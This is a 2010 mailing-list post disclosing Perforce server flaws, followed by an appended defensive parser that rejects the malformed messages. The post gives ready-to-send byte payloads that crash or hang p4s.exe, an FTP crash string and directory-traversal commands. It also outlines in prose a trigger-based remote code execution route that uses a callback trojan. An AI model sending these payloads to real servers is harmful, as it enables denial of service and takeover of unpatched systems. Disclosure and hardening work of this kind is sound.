Dailydave mailing list archives

Perforce


From: Intevydis <admin () vulndisco net>
Date: Thu, 04 Mar 2010 18:18:53 +0300

Hi,


Usually I tend to ignore articles related to "sophisticated" Aurora
attacks, but according to
http://www.wired.com/threatlevel/2010/03/source-code-hacks many
companies use Perforce. Big surprise...

About two years ago we performed some quick testing of Perforce 2008.1
and released some bugs with Vulndisco:

1. p4s.exe DoS (crash)

to trigger, send the following data to port "

s="\x4c\xb3\xff\xff\xff\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"


2. p4s.exe DoS (infinite loop)

to trigger:

s="\x1b\x1b\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\xdc\xff\xff\xff\x36\x33\x00"


3. another p4s.exe crash:

s="\x4c\x4c\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"
s+="\x61\x70\x69\x00\x0c\xff\xff\xff\x39\x39\x39\x39\x39\x00\x73\x6e"
s+="\x64\x62\x75\x66\x00\x05\x00\x00\x00\x36\x35\x35\x33\x36\x00\x66"
s+="\x75\x6e\x63\x00\x08\x00\x00\x00\x70\x72\x6f\x74\x6f\x63\x6f\x6c"
s+="\x00"

4. Perforce FTP server null ptr crash

to trigger - "MKD x\r\n"


5. Perforce dir traversal

Trivial bug: on Windows it is possible to create files outside of the
repository directory, something like:
$ echo TESTTEST > "..\\..\\..\\..\\..\\..\\..\\test.txt"
$ p4 add "..\\..\\..\\..\\..\\..\\..\\test.txt"
//depot/..\..\..\..\..\..\..\test.txt#1 - opened for add
$ p4 submit

On a Windows box the file C:\test.txt,v will be created.


6. remote exploit
We've exploited the triggers feature of the Perforce server; triggers allow us
to run external OS commands. To use this bug you will need an account
with 'super' privileges; how you can get it:
1. easy way - there is an empty protection table, so the first user who
runs 'p4 protect' will be superuser (another nice feature of Perforce)
2. hard way - run 'p4 protects', see who has super privileges and brute
force his account

So, in our exploit we've been using a 'form-in' trigger; it is fired
each time we try to define a new client ('p4 client'). Our trigger saves
a MOSDEF callback trojan in /tmp and executes it.

Of course all these bugs might be fixed now - no surprise, we found
them ~2 years ago.

Do not get me wrong, our Perforce skill level is nothing compared to
McAfee's experts; we are just script kiddies playing with Wireshark and
netcat.

Regards,
Evgeny L.
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
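Reading the three p4s.exe triggers above, each one carries a negative 4-byte little-endian length somewhere in the key/length/value framing (the header length in the first, a field value length in the second and third). Below is an added example, not code from the post or from Perforce, of a parser that validates that framing the way a hardened server should, rejecting any length that is negative or does not fit the bytes actually received. The framing (1 checksum byte + 4-byte LE body length, then repeated key NUL, 4-byte LE value length, value, NUL) is inferred from the byte strings in the post, and the checksum being the XOR of the four length bytes is an assumption.

```python
import struct


class MalformedMessage(ValueError):
    """Raised instead of letting a bad length drive a crash or a spin loop."""


def parse_message(buf: bytes, max_body: int = 1 << 20) -> dict:
    """Parse one framed message, rejecting every out-of-range length."""
    if len(buf) < 5:
        raise MalformedMessage("short header")
    # Header: 1 byte (checksum, not verified here) + 4-byte LE body length,
    # read as signed so a wrapped value such as 0xffffffb3 shows up as -77.
    body_len = struct.unpack_from("<i", buf, 1)[0]
    if not 0 <= body_len <= max_body or body_len != len(buf) - 5:
        raise MalformedMessage(f"bad body length {body_len}")
    body, pos, fields = buf[5:], 0, {}
    while pos < len(body):
        end = body.find(b"\0", pos)           # key is NUL-terminated
        if end < 0 or end + 5 > len(body):    # need NUL + 4-byte length
            raise MalformedMessage("truncated key")
        key = body[pos:end].decode("ascii", "replace")
        vlen = struct.unpack_from("<i", body, end + 1)[0]
        pos = end + 5
        # value plus its own NUL terminator must fit in what is left
        if vlen < 0 or vlen > len(body) - pos - 1 or body[pos + vlen] != 0:
            raise MalformedMessage(f"bad length {vlen} for key {key!r}")
        fields[key] = body[pos:pos + vlen]
        pos += vlen + 1
    return fields


def is_malformed(buf: bytes) -> bool:
    """True when parse_message would reject buf (no exception escapes)."""
    try:
        parse_message(buf)
    except MalformedMessage:
        return True
    return False


def build_message(fields: dict) -> bytes:
    """Inverse of parse_message, for producing well-formed test input."""
    body = b"".join(k.encode() + b"\0" + struct.pack("<i", len(v)) + v + b"\0"
                    for k, v in fields.items())
    hdr = struct.pack("<i", len(body))
    checksum = hdr[0] ^ hdr[1] ^ hdr[2] ^ hdr[3]  # assumption: XOR of length bytes
    return bytes([checksum]) + hdr + body
```

Building the field set from the third trigger with a correct api length of 5 reproduces the post's own header bytes 4c 4c 00 00 00, which is what the XOR assumption rests on.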

